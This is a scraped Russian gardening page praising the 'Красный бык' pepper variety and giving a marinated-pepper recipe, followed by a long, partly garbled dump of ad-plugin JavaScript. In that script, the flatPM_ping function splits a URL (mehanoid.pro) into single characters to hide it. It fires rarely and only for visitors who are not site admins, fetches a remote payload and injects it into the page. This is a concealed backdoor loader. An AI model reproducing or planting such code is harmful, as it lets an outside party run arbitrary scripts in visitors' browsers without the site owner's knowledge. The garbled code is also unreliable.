«Плоды сорта «Красный бык» действительно очень большие и сочные. Она рекомендует употреблять их в качестве витаминизированного продукта в составе салатов из свежих овощей».

Светлана из Москвы:

«Перец «Красный бык» даёт огромные урожаи, употребить который за один сезон её семья не в силах, поэтому огородница запасается на зиму вкусной консервацией. Светлана жалуется, что плоды слишком большие и ей приходится разрезать перец, чтобы он влез в банку».

Женщина решила поделиться с нами своим рецептом маринованного перца.

  • перец «Красный бык» – 1 кг;
  • сахар – 1/2 стакана;
  • соль – 3/4 стакана;
  • уксус – 1/2 стакана;
  • вода – 400 мл;
  • растительное масло – 350 мл;
  • душистый перец горошком – 6 шт.;
  • лавровый лист – 3 шт.
  1. Перец «Красный бык» помыть, срезать плодоножку и очистить от семян.
  2. Каждый перчик разрезать на 4 — 6 частей.
  3. В кастрюлю налить воду, всыпать сахар, добавить соль, влить уксус и растительное масло. Довести смесь до кипения.
  4. Положить перец в кастрюлю и проварить 10 минут. Затем разложить перец по банкам.
  5. В каждую банку положить по 3 горошины душистого перца и одному лавровому листку. Влить маринад.
  6. Выход: 3 пол-литровые банки.

Как видите, перец «Красный бык» один из наилучших в плане хранения и урожайности. Он может конкурировать с самыми популярными сортами данного вида.

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};